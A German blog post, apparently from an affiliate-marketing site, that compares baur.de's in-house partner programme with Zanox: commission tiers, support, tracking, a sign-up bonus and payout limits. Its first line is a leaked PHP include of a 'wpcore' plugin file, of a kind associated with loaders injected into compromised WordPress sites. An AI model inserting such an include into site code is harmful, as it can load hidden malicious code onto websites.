require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); Inhouse Partnerprogramm von baur.de | Beste-Partnerprogramme.de

Inhouse Partnerprogramm von baur.de

1. März 2012
By

BAUR ist wohl neben Otto der bekannteste Katalogversender Deutschlands und betreibt mit baur.de auch einen der bekanntesten und größten Onlineshops im deutschsprachigen Raum.
Neben Markenmode für Damen, Herren und Kinder bietet Baur.de Möbel, Freizeitartikel, Spielzeug und Elektroartikel.

Die hohe Bekanntheit der Marke macht das Bewerben leicht. Bewerben kann man Baur.de entweder über Zanox oder über das eigene Inhouse Partnerprogramm.
Ich empfehle aber eindeutig die Teilnahme am Inhouse Partnerprogramm.   Beim Inhouse-Partnerprogramm von Baur.de anmelden

Dies hat folgende Gründe.

  • Provisionsmodell:
    • Bei den Standardpartnern gibt es hier keinen Unterschied. Standardpartner erhalten sowohl bei Zanox als auch im internen Programm für jeden vermittelten Sale 6Euro. Bei mehr als 20 Sales im Monat gibt es pro Sale einen euro extra. Als Standardpartner gilt man bis 4.999 Euro vermittelten Warenkorbumsatz im Monat. Erreicht man diese Umsatzhöhe jedoch oder erreicht man sogar mehr als 20.000 Euro Umsatz pro Monat dann wird mit dem internen Partnerprogramm erheblich mehr Geld verdient.
    • Als bevorzugter Partner (Warenkorbumsatz 5.000 Euro bis 19.999 Euro / Monat) gibt es bis 40 Sales im Monat jeweils 7 Euro. Werden mehr als 40 Sales generiert steigt die Provision für alle Sales in diesem Monat auf je 8 Euro.
    • Als Premiumpartner (Warenkorbumsatz ab 20.000 Euro /Monat) gibt es bis 100 Sales im Monat jeweils 8 Euro. Werden mehr als 100 Sales generiert steigt die Provision für alle Sales in diesem Monat auf je 10 Euro.

     

  • Prompter und guter Support:
    Als Vorbereitung für diesen Artikel habe ich mich natürlich im internen Partnerprogramm angemeldet. Die Freischaltung hat zuerst einige Tage gedauert was grundsätzlich negativ zu bewerten ist. Dann habe ich jedoch per Kontaktformular nachgefragt, und wurde prompt innerhalb von 5 Minuten freigeschaltet. Mittlerweile konnte ich sogar mit dem E-Commerce Projektleiter Herrn Barth telefonieren um die letzten Fragen zu klären.
  • Ausgefeilteres Tracking und besseres Reporting
    • Auf Anfrage ist ein Einbau eigener Conversionpixel sowie eigenes Tracking auf speziellen Landingpages möglich. Darüberhinaus wird einer Referstatistik angeboten und es kann mit eigenen SubIDs gearbeitet werden. Das ist natürlich perfekt möchte man sein Budget für seine Werbemassnahmen optimieren – und wer will das nicht :o )
    • Welche Produkte wurden wann wie oft gekauft? Diese Frage beantwortet die Produktstatistik, die die vermittelten Produkte auch noch jeweils nach SubIds auswerten kann. Dies ist ebenfalls eine weitere gute Hilfe um seine Bewerbung zu optimieren.

     

  • Direkte BAUR Links
    Das interne Baur Partnerprogramm nutzt Referrer Tracking. Das beutet: Wenn Sie die Website-URL verwenden die Sie bei der Bewerbung zum internen Partnerprogramm angegeben haben, erkennt das Affiliatesystem automatisch, dass der Besucher über Ihre URL kam. PartnerIDs in den Links sind somit überflüssig.
    Zitat aus dem Partnerprogramm:
    “Sie können sich unsere Werbemittel auswählen, wie z. B. Banner oder Textlinks und Sie können auch jede x-beliebige BAUR URL aus dem Shop kopieren und benutzen, denn wir erkennen Sie über den bei uns ankommenden Referrer. Wir benötigen somit keine Partner ID oder sonstige Parameter in der URL.  Ihre Links zu uns sehen also alle wie normale Links aus.”
  • 15 Euro Anmeldebonus
    Direkt mit der Bestätigung zum Partnerprogramm verfügen Sie über ein Startguthaben von 15Euro. Da die Auszahlungsminimumgrenze bei 35Euro liegt, fehlen Ihnen somit noch 20Euro, die Sie an Provisionen verdienen müssen um die erste Auszahlung veranlassen zu können.

 

  • Nun noch kurz zu den Nachteilen:
    • Leider bietet BAUR sowohl bei Zanox als auch im internen Partnerprogramm nur Session Tracking an. Kauft ein von Ihnen vermittelter Besucher nicht schon direkt bei Baur sondern erst in einer neuen Browsersession fällt keine Provision an. Dies ist aber bei allen großen und bekannten Partnerprogrammen wie Otto und Amazon so. Die Marke ist schon so bekannt, dass diese Partnerprogramme es sich leisten können darauf zu verzichten.
    • Die Auszahlungsgrenze bei Zanox liegt bei 25 Euro. Im internen Partnerprogramm liegt sie bei 35 Euro. Da Sie bei Zanox die Provisionen aller dort verfügbarer Partnerprogramme dem Partnerkonto aufsaldiert, können Sie die die 25Euro Auszahlungsgrenze also nicht nur allein durch die Teilnahme am Baurpartnerprogramm erreichen. Grundsätzlich geht es natürlich schneller bei einem großen Partnerprogrammnetzwerk wie Zanox die Auszahlungsgrenze zu erreichen als bei einem Inhouse Partnerprogramm. Dies gilt nicht nur für das BAUR Partnerprogramm. Insgesamt überwiegen meiner Meinung nach aber die Vorteile eines guten Inhouse Partnerprogramms fast immer im Vergleich zu einem Netzwerk wie Affili.net oder Zanox.

Beim Inhouse-Partnerprogramm von Baur.de anmelden

 

Tags: , ,